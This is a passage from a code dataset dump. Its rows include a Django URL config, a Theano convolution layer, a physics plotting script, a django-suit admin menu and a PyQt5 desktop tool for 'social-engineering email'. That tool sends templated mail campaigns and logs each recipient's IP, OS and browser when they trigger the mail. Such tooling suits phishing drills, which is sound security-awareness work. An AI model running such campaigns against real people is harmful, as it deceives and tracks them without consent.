'tensorflow.keras.layers.Concatenate', 'keras.layers.Concatenate', ([], {}), '()\\n', (23069, 23071), False, 'from tensorflow import keras\\n'), ((23098, 23141), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(4)'], {'activation': '\"\"\"softmax\"\"\"'}), \"(4, activation='softmax')\\n\", (23116, 23141), False, 'from tensorflow import keras\\n'), ((23314, 23336), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (23334, 23336), True, 'import tensorflow as tf\\n'), ((23348, 23370), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\\n', (23363, 23370), True, 'import numpy as np\\n'), ((23559, 23618), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\\n', (23596, 23618), False, 'from tensorflow import keras\\n'), ((23701, 23736), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs\"\"\"'], {}), \"(self._tmp_dir, 'tfjs')\\n\", (23713, 23736), False, 'import os\\n'), ((23814, 23933), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\\n _tmp_dir, tfjs_output_dir]\"], {}), 
\"(['tensorflowjs_converter', '--input_format',\\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\\n\", (23830, 23933), False, 'import subprocess\\n'), ((24057, 24100), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '\"\"\"model.json\"\"\"'], {}), \"(tfjs_output_dir, 'model.json')\\n\", (24069, 24100), False, 'import os\\n'), ((24231, 24271), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"new_h5.h5\"\"\"'], {}), \"(self._tmp_dir, 'new_h5.h5')\\n\", (24243, 24271), False, 'import os\\n'), ((24288, 24437), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\\n '--output_format', 'keras', model_json_path, new_h5_path]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\\n new_h5_path])\\n\", (24304, 24437), False, 'import subprocess\\n'), ((24691, 24727), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\\n', (24714, 24727), False, 'from tensorflow import keras\\n'), ((24902, 24924), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (24922, 24924), True, 'import tensorflow as tf\\n'), ((24937, 24958), 'numpy.random.randn', 'np.random.randn', (['(4)', '(8)'], {}), '(4, 8)\\n', (24952, 24958), True, 'import numpy as np\\n'), ((24970, 24992), 'numpy.random.randn', 'np.random.randn', (['(4)', '(10)'], {}), '(4, 10)\\n', (24985, 24992), True, 'import numpy as np\\n'), ((25193, 25252), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\\n', (25230, 25252), False, 'from tensorflow import keras\\n'), ((25335, 25370), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs\"\"\"'], {}), \"(self._tmp_dir, 'tfjs')\\n\", (25347, 25370), False, 'import os\\n'), ((25449, 25613), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras_saved_model',\\n '--output_format', 'tfjs_layers_model', self._tmp_dir, tfjs_output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'keras_saved_model', '--output_format', 'tfjs_layers_model', self.\\n _tmp_dir, tfjs_output_dir])\\n\", (25465, 25613), False, 'import subprocess\\n'), ((25742, 25785), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '\"\"\"model.json\"\"\"'], {}), \"(tfjs_output_dir, 'model.json')\\n\", (25754, 25785), False, 'import os\\n'), ((25916, 25956), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"new_h5.h5\"\"\"'], {}), \"(self._tmp_dir, 'new_h5.h5')\\n\", (25928, 25956), False, 'import os\\n'), ((25973, 26122), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\\n '--output_format', 'keras', model_json_path, new_h5_path]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\\n new_h5_path])\\n\", (25989, 26122), False, 'import subprocess\\n'), ((26376, 26412), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\\n', (26399, 26412), False, 'from tensorflow import keras\\n'), ((26586, 26608), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (26606, 26608), True, 'import tensorflow as tf\\n'), ((26620, 26642), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\\n', (26635, 26642), True, 'import numpy as np\\n'), ((26831, 
[… remainder of the previous row's extract_api list: offset-indexed call records for tensorflow.keras.experimental.export_saved_model, os.path.join, subprocess.Popen (invoking tensorflowjs_converter with --input_format keras / keras_saved_model), tf.compat.v1.Session, tf.Graph, numpy.random.randn, numpy.size, tensorflow.keras.models.load_model, tensorflow.keras.layers.Dense, json.load, os.path.dirname, os.path.isfile, os.path.getsize, tf.compat.as_bytes and tf.compat.v1.saved_model.signature_def_utils.predict_signature_def …]

Row 734 — code (a Django project urls.py):

from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic import TemplateView

urlpatterns = [
    path('api-auth/', include('rest_framework.urls')),
    path('rest-auth/', include('rest_auth.urls')),
    path('rest-auth/registration/', include('rest_auth.registration.urls')),
    path('admin/', admin.site.urls),
    path('api/', include('core.api.urls')),
]

if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL,
                           document_root=settings.MEDIA_ROOT)

if not settings.DEBUG:
    urlpatterns += [re_path(r'^.*',
                            TemplateView.as_view(template_name='index.html'))]

Row 734 — apis: django.conf.urls.static.static, django.views.generic.TemplateView.as_view, django.urls.path, django.urls.include

Row 734 — extract_api: offset-indexed records for the path, include, static and TemplateView.as_view calls above, in the same layout as the other rows.
Row 735 — code (a PyQt5 desktop tool titled "社交郵件工程", i.e. a social-engineering mail-campaign manager): [… full source captured in the dump: PyQt5 / QWebEngineView / pyqtgraph / qdarkstyle imports, a SubWindow(QWidget) dialog for addressing a single test mail, and a MailserverUi(QMainWindow) whose panels cover sending campaigns (display_send_mail, send_mail, with an optional schedule handed to server.client.Client), SMTP settings and test sends (display_smtp_setting, show_sub_win, send_test via server.sendmail.Smtp and mylibrary.genmail), database settings (display_db_setting for server.database.Database), EML template editing with an HTML/web preview tab (display_update_eml, eml_open, eml_save, eml_reset, email.generator.Generator), and trigger-log viewing, filtering and export to Excel (display_logs, logs_change, logs_download via pandas.DataFrame), plus a main() entry point …]

Row 735 — apis: PyQt5.QtGui.QColor, PyQt5.QtWidgets.QApplication, copy.deepcopy, PyQt5.QtWidgets.QFileDialog.getOpenFileName, PyQt5.QtWidgets.QTableWidget, PyQt5.QtWidgets.QTextEdit, PyQt5.QtWidgets.QFileDialog.getSaveFileName, email.generator.Generator, PyQt5.QtWidgets.QComboBox, PyQt5.QtCore.QDateTime.currentDateTime, qdarkstyle.load_stylesheet_pyqt5, GenAndSendMail.insert_send_mail, PyQt5.QtWidgets.QLabel, pandas.DataFrame, PyQt5.QtWidgets.QPushButton, PyQt5.QtWidgets.QLineEdit, PyQt5.QtWidgets.QWidget, PyQt5.QtWidgets.QApplication.instance, mylibrary.genmail.get_msg, PyQt5.QtWebEngineWidgets.QWebEngineView, PyQt5.QtWidgets.QMessageBox.information, pyqtgraph.setConfigOptions, PyQt5.QtWidgets.QGridLayout, server.sendmail.Smtp, server.client.Client, PyQt5.QtWidgets.QTabWidget, PyQt5.QtWidgets.QCheckBox, mylibrary.genmail.gen_eml, pyqtgraph.GraphicsLayoutWidget, pyqtgraph.setConfigOption, server.database.Database, PyQt5.QtWidgets.QMessageBox.warning

Row 735 — extract_api: offset-indexed records for the constructors and calls above, in the same layout as the previous rows; the captured page ends mid-record, cutting off the final entry (a pandas.DataFrame(self.data_temp_logs) call).
'(self.data_temp_logs)\\n', (22181, 22202), False, 'from pandas import DataFrame\\n'), ((22272, 22338), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '\"\"\"Success!\"\"\"', '\"\"\"儲存成功!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Success!', '儲存成功!', QMessageBox.Ok)\\n\", (22295, 22338), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((17150, 17156), 'server.sendmail.Smtp', 'Smtp', ([], {}), '()\\n', (17154, 17156), False, 'from server.sendmail import Smtp\\n'), ((17298, 17308), 'server.database.Database', 'Database', ([], {}), '()\\n', (17306, 17308), False, 'from server.database import Database\\n'), ((18503, 18589), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '\"\"\"Warning!\"\"\"', \"('信件寄出成功!\\\\nWaning: ' + error)\", 'QMessageBox.Ok'], {}), \"(self, 'Warning!', '信件寄出成功!\\\\nWaning: ' + error,\\n QMessageBox.Ok)\\n\", (18522, 18589), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((18626, 18694), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '\"\"\"Success!\"\"\"', '\"\"\"信件寄出成功!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\\n\", (18649, 18694), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((20429, 20440), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (20438, 20440), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((22375, 22436), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '\"\"\"Failed!\"\"\"', '\"\"\"儲存失敗!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\\n\", (22394, 22436), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((14893, 14904), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (14902, 14904), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((14992, 15003), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ([], {}), '()\\n', (15001, 15003), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((21802, 21823), 'PyQt5.QtGui.QColor', 'QColor', (['(144)', '(182)', '(240)'], {}), '(144, 182, 240)\\n', (21808, 21823), False, 'from PyQt5.QtGui import QPalette, QColor, 
QBrush\\n'), ((14354, 14375), 'PyQt5.QtGui.QColor', 'QColor', (['(144)', '(182)', '(240)'], {}), '(144, 182, 240)\\n', (14360, 14375), False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\\n')]"}}},{"rowIdx":736,"cells":{"code":{"kind":"string","value":"\"\"\"\nGpuCorrMM-based convolutional layers\n\"\"\"\n\nimport numpy as np\n\nimport theano\nimport theano.tensor as T\nfrom theano.sandbox.cuda.basic_ops import gpu_contiguous\nfrom theano.sandbox.cuda.blas import GpuCorrMM\n\nfrom .. import init\nfrom .. import nonlinearities\nfrom . import base\n\n\n# base class for all layers that rely on GpuCorrMM directly\nclass MMLayer(base.Layer):\n pass\n\n\nclass Conv2DMMLayer(MMLayer):\n def __init__(self, input_layer, num_filters, filter_size, strides=(1, 1), border_mode=None, untie_biases=False,\n W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify, pad=None,\n flip_filters=False):\n super(Conv2DMMLayer, self).__init__(input_layer)\n if nonlinearity is None:\n self.nonlinearity = nonlinearities.identity\n else:\n self.nonlinearity = nonlinearity\n\n self.num_filters = num_filters\n self.filter_size = filter_size\n self.strides = strides\n self.untie_biases = untie_biases\n self.flip_filters = flip_filters\n\n if border_mode is not None and pad is not None:\n raise RuntimeError(\"You cannot specify both 'border_mode' and 'pad'. To avoid ambiguity, please specify only one of them.\")\n elif border_mode is None and pad is None:\n # no option specified, default to valid mode\n self.pad = (0, 0)\n elif border_mode is not None:\n if border_mode == 'valid':\n self.pad = (0, 0)\n elif border_mode == 'full':\n self.pad = (self.filter_size[0] - 1, self.filter_size[1] -1)\n elif border_mode == 'same':\n # only works for odd filter size, but the even filter size case is probably not worth supporting.\n self.pad = ((self.filter_size[0] - 1) // 2, (self.filter_size[1] - 1) // 2)\n else:\n raise RuntimeError(\"Unsupported border_mode for Conv2DMMLayer: %s\" % border_mode)\n else:\n self.pad = pad\n\n self.W = self.create_param(W, self.get_W_shape())\n if b is None:\n self.b = None\n elif self.untie_biases:\n output_shape = self.get_output_shape()\n self.b = self.create_param(b, (num_filters, output_shape[2], output_shape[3]))\n else:\n self.b = self.create_param(b, (num_filters,))\n\n self.corr_mm_op = GpuCorrMM(subsample=self.strides, pad=self.pad)\n\n def get_W_shape(self):\n num_input_channels = self.input_layer.get_output_shape()[1]\n return (self.num_filters, num_input_channels, self.filter_size[0], self.filter_size[1])\n\n def get_params(self):\n return [self.W] + self.get_bias_params()\n\n def get_bias_params(self):\n return [self.b] if self.b is not None else []\n\n def get_output_shape_for(self, input_shape):\n batch_size = input_shape[0]\n input_width, input_height = input_shape[2:4]\n output_width = (input_width + 2*self.pad[0] - self.filter_size[0]) // self.strides[0] + 1\n output_height = (input_height + 2*self.pad[1] - self.filter_size[1]) // self.strides[1] + 1\n return (batch_size, self.num_filters, output_width, output_height)\n\n def get_output_for(self, input, *args, **kwargs):\n filters = self.W\n if self.flip_filters:\n filters = filters[:, :, ::-1, ::-1] # flip width, height\n \n contiguous_filters = gpu_contiguous(filters)\n contiguous_input = gpu_contiguous(input)\n conved = self.corr_mm_op(contiguous_input, contiguous_filters)\n\n if self.b is None:\n activation = conved\n elif self.untie_biases:\n activation = conved + self.b.dimshuffle('x', 0, 1, 2)\n 
else:\n activation = conved + self.b.dimshuffle('x', 0, 'x', 'x')\n\n return self.nonlinearity(activation)\n\n"},"apis":{"kind":"list like","value":["theano.sandbox.cuda.basic_ops.gpu_contiguous","theano.sandbox.cuda.blas.GpuCorrMM"],"string":"[\n \"theano.sandbox.cuda.basic_ops.gpu_contiguous\",\n \"theano.sandbox.cuda.blas.GpuCorrMM\"\n]"},"extract_api":{"kind":"string","value":"[((2405, 2452), 'theano.sandbox.cuda.blas.GpuCorrMM', 'GpuCorrMM', ([], {'subsample': 'self.strides', 'pad': 'self.pad'}), '(subsample=self.strides, pad=self.pad)\\n', (2414, 2452), False, 'from theano.sandbox.cuda.blas import GpuCorrMM\\n'), ((3436, 3459), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', (['filters'], {}), '(filters)\\n', (3450, 3459), False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\\n'), ((3487, 3508), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', (['input'], {}), '(input)\\n', (3501, 3508), False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\\n')]"}}},{"rowIdx":737,"cells":{"code":{"kind":"string","value":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nimport sys\nsys.path.append(\"../\")\nfrom quelea import *\n\nnx = 217\nny = 133\n\nx0 = 0\nx1 = 30 # lambdas\ny0 = 0\ny1 = 20 # lambdas\n\nxs = np.linspace(x0, x1, nx)\nys = np.linspace(y0, y1, ny)\n\n# 2d array of (x, y, z, t)\ncoords = np.array( [ [x, y, 0, 0] for x in xs for y in ys ] )\n# for map_fields function this should be converted from 2D to 1D array\ncoords = coords.reshape((4 * nx * ny,))\n\nftype = 1 # plane wave\na0 = 1 # normalized field amplitude\nomega = 1 # frequency\nfparam = [a0, 1, 0, 0, 0, 1, 0, 0, omega] # parameters of the plane wave\n\nex, ey, ez, bx, by, bz = map_fields(coords, ftype, fparam)\n# now convert to 2d arrays\nex = ex.reshape((nx, ny))\ney = ey.reshape((nx, ny))\nez = ez.reshape((nx, ny))\nbx = bx.reshape((nx, ny))\nby = by.reshape((nx, ny))\nbz = bz.reshape((nx, ny))\nex = ex.transpose()\ney = ey.transpose()\nez = ez.transpose()\nbx = bx.transpose()\nby = by.transpose()\nbz = bz.transpose()\n\nplt.imshow(ey, cmap = 'RdYlBu', origin = 'lower', extent = [x0, x1, y0, y1])\nplt.colorbar()\nplt.clim(-a0, a0)\n\nplt.savefig(\"map_fields.pdf\")\n\n"},"apis":{"kind":"list like","value":["matplotlib.pyplot.imshow","matplotlib.pyplot.clim","matplotlib.pyplot.savefig","matplotlib.pyplot.colorbar","numpy.array","numpy.linspace","sys.path.append"],"string":"[\n \"matplotlib.pyplot.imshow\",\n \"matplotlib.pyplot.clim\",\n \"matplotlib.pyplot.savefig\",\n \"matplotlib.pyplot.colorbar\",\n \"numpy.array\",\n \"numpy.linspace\",\n \"sys.path.append\"\n]"},"extract_api":{"kind":"string","value":"[((81, 103), 'sys.path.append', 'sys.path.append', (['\"\"\"../\"\"\"'], {}), \"('../')\\n\", (96, 103), False, 'import sys\\n'), ((201, 224), 'numpy.linspace', 'np.linspace', (['x0', 'x1', 'nx'], {}), '(x0, x1, nx)\\n', (212, 224), True, 'import numpy as np\\n'), ((230, 253), 'numpy.linspace', 'np.linspace', (['y0', 'y1', 'ny'], {}), '(y0, y1, ny)\\n', (241, 253), True, 'import numpy as np\\n'), ((291, 339), 'numpy.array', 'np.array', (['[[x, y, 0, 0] for x in xs for y in ys]'], {}), '([[x, y, 0, 0] for x in xs for y in ys])\\n', (299, 339), True, 'import numpy as np\\n'), ((974, 1044), 'matplotlib.pyplot.imshow', 'plt.imshow', (['ey'], {'cmap': '\"\"\"RdYlBu\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[x0, x1, y0, y1]'}), \"(ey, cmap='RdYlBu', origin='lower', extent=[x0, x1, y0, y1])\\n\", (984, 1044), True, 'import 
matplotlib.pyplot as plt\\n'), ((1051, 1065), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\\n', (1063, 1065), True, 'import matplotlib.pyplot as plt\\n'), ((1066, 1083), 'matplotlib.pyplot.clim', 'plt.clim', (['(-a0)', 'a0'], {}), '(-a0, a0)\\n', (1074, 1083), True, 'import matplotlib.pyplot as plt\\n'), ((1085, 1114), 'matplotlib.pyplot.savefig', 'plt.savefig', (['\"\"\"map_fields.pdf\"\"\"'], {}), \"('map_fields.pdf')\\n\", (1096, 1114), True, 'import matplotlib.pyplot as plt\\n')]"}}},{"rowIdx":738,"cells":{"code":{"kind":"string","value":"from django.conf import settings\n\nfrom suit import apps\nfrom suit.apps import DjangoSuitConfig\nfrom suit.menu import ParentItem, ChildItem\n\nAPP_NAME = settings.APP_NAME\nWIKI_URL = settings.WIKI_URL\n\nclass SuitConfig(DjangoSuitConfig):\n name = 'suit'\n verbose_name = 'Mbiome Core JAXid Generator'\n site_title = 'Mbiome Core JAXid Tracking'\n site_header = site_title\n index_title = verbose_name\n\n layout = 'vertical'\n list_per_page = 35\n\n # header_date_format = 'l, d-M-o'\n # header_time_format = 'H:i e'\n\n menu = (\n ParentItem('JAX Id Record Lists',\n use_first_child_url=True,\n url='',\n children=[\n ChildItem('JAXid Records', model='id_generate.jaxiddetail'),\n ChildItem(model='id_generate.boxid'),\n ChildItem(model='id_generate.plateid'),\n ],\n icon='fa fa-list-ul'),\n ParentItem('Reference Data',\n use_first_child_url=True,\n url='',\n children=[\n ChildItem(model='id_generate.projectcode'),\n ChildItem(model='id_generate.nucleicacidtype'),\n ChildItem(model='id_generate.sampletype'),\n ChildItem(model='id_generate.sequencingtype'),\n ],\n icon='fa fa-list'),\n ParentItem(\n label='Generate new JAXid''s',\n url=f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/',\n permissions='id_generate.change_jaxiddetail',\n icon='fa fa-rocket'),\n ParentItem(\n label='Generate new Box ID''s',\n url=f'/{APP_NAME}/manage/id_generate/boxid/import/',\n permissions='id_generate.change_boxid',\n icon='fa fa-cube'),\n ParentItem(\n label='Generate new Plate ID''s',\n url=f'/{APP_NAME}/manage/id_generate/plateid/import/',\n permissions='id_generate.change_plateid',\n icon='fa fa-circle-o-notch'),\n ParentItem(\n label='Authorization',\n children=[\n ChildItem('Staff', model='auth.user'),\n ChildItem(model='auth.group'),\n ChildItem(model='admin.logentry'),\n ],\n icon='fa fa-user-circle'),\n\n ParentItem(\n label='SOP and Request Sheet',\n use_first_child_url=False,\n url='',\n children=[\n ChildItem('View JAX ID Request SOP',\n target_blank=True,\n url=f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'),\n ChildItem('View JAX ID Request Template Sheet',\n url=f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'),\n ],\n icon='fa fa-file'),\n )\n # menu_handler = None\n menu_show_home = False\n\n\n # Show changelist top actions only if any row is selected\n toggle_changelist_top_actions = False\n\n\n# # Enables two column layout for change forms with submit row on the right\n form_submit_on_right = False\n\n # Hide name/\"original\" column for all tabular inlines.\n # May be overridden in Inline class by suit_form_inlines_hide_original = False\n #form_inlines_hide_original = False\n\n form_size = {\n 'default': apps.SUIT_FORM_SIZE_LARGE,\n 'widgets': {\n 'AutosizedTextarea': apps.SUIT_FORM_SIZE_X_LARGE,\n 'Textarea': 
apps.SUIT_FORM_SIZE_X_LARGE,\n },\n }\n\n # form_size setting can be overridden in ModelAdmin using suit_form_size parameter\n #\n # Example:\n # ----------------------------------------------\n # suit_form_size = {\n # 'default': 'col-xs-12 col-sm-2', 'col-xs-12 col-sm-10',\n # 'fields': {\n # 'field_name': SUIT_FORM_SIZE_LARGE,\n # 'field_name2': SUIT_FORM_SIZE_X_LARGE,\n # },\n # 'widgets': {\n # 'widget_class_name': SUIT_FORM_SIZE_FULL,\n # 'AdminTextareaWidget': SUIT_FORM_SIZE_FULL,\n # },\n # 'fieldsets': {\n # 'fieldset_name': SUIT_FORM_SIZE_FULL,\n # 'fieldset_name2': SUIT_FORM_SIZE_FULL,\n # }\n # }\n"},"apis":{"kind":"list like","value":["suit.menu.ChildItem","suit.menu.ParentItem"],"string":"[\n \"suit.menu.ChildItem\",\n \"suit.menu.ParentItem\"\n]"},"extract_api":{"kind":"string","value":"[((1411, 1586), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '\"\"\"Generate new JAXids\"\"\"', 'url': 'f\"\"\"/{APP_NAME}/manage/id_generate/jaxiddetail/import/\"\"\"', 'permissions': '\"\"\"id_generate.change_jaxiddetail\"\"\"', 'icon': '\"\"\"fa fa-rocket\"\"\"'}), \"(label='Generate new JAXids', url=\\n f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/', permissions=\\n 'id_generate.change_jaxiddetail', icon='fa fa-rocket')\\n\", (1421, 1586), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((1657, 1819), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '\"\"\"Generate new Box IDs\"\"\"', 'url': 'f\"\"\"/{APP_NAME}/manage/id_generate/boxid/import/\"\"\"', 'permissions': '\"\"\"id_generate.change_boxid\"\"\"', 'icon': '\"\"\"fa fa-cube\"\"\"'}), \"(label='Generate new Box IDs', url=\\n f'/{APP_NAME}/manage/id_generate/boxid/import/', permissions=\\n 'id_generate.change_boxid', icon='fa fa-cube')\\n\", (1667, 1819), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((1890, 2068), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '\"\"\"Generate new Plate IDs\"\"\"', 'url': 'f\"\"\"/{APP_NAME}/manage/id_generate/plateid/import/\"\"\"', 'permissions': '\"\"\"id_generate.change_plateid\"\"\"', 'icon': '\"\"\"fa fa-circle-o-notch\"\"\"'}), \"(label='Generate new Plate IDs', url=\\n f'/{APP_NAME}/manage/id_generate/plateid/import/', permissions=\\n 'id_generate.change_plateid', icon='fa fa-circle-o-notch')\\n\", (1900, 2068), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((703, 762), 'suit.menu.ChildItem', 'ChildItem', (['\"\"\"JAXid Records\"\"\"'], {'model': '\"\"\"id_generate.jaxiddetail\"\"\"'}), \"('JAXid Records', model='id_generate.jaxiddetail')\\n\", (712, 762), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((784, 820), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"id_generate.boxid\"\"\"'}), \"(model='id_generate.boxid')\\n\", (793, 820), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((842, 880), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"id_generate.plateid\"\"\"'}), \"(model='id_generate.plateid')\\n\", (851, 880), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((1098, 1140), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"id_generate.projectcode\"\"\"'}), \"(model='id_generate.projectcode')\\n\", (1107, 1140), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((1162, 1208), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"id_generate.nucleicacidtype\"\"\"'}), \"(model='id_generate.nucleicacidtype')\\n\", (1171, 1208), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((1230, 1271), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': 
'\"\"\"id_generate.sampletype\"\"\"'}), \"(model='id_generate.sampletype')\\n\", (1239, 1271), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((1293, 1338), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"id_generate.sequencingtype\"\"\"'}), \"(model='id_generate.sequencingtype')\\n\", (1302, 1338), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((2237, 2274), 'suit.menu.ChildItem', 'ChildItem', (['\"\"\"Staff\"\"\"'], {'model': '\"\"\"auth.user\"\"\"'}), \"('Staff', model='auth.user')\\n\", (2246, 2274), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((2296, 2325), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"auth.group\"\"\"'}), \"(model='auth.group')\\n\", (2305, 2325), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((2347, 2380), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"admin.logentry\"\"\"'}), \"(model='admin.logentry')\\n\", (2356, 2380), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((2634, 2845), 'suit.menu.ChildItem', 'ChildItem', (['\"\"\"View JAX ID Request SOP\"\"\"'], {'target_blank': '(True)', 'url': 'f\"\"\"{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx\"\"\"'}), \"('View JAX ID Request SOP', target_blank=True, url=\\n f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'\\n )\\n\", (2643, 2845), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((2917, 3142), 'suit.menu.ChildItem', 'ChildItem', (['\"\"\"View JAX ID Request Template Sheet\"\"\"'], {'url': 'f\"\"\"{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx\"\"\"'}), \"('View JAX ID Request Template Sheet', url=\\n f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'\\n )\\n\", (2926, 3142), False, 'from suit.menu import ParentItem, 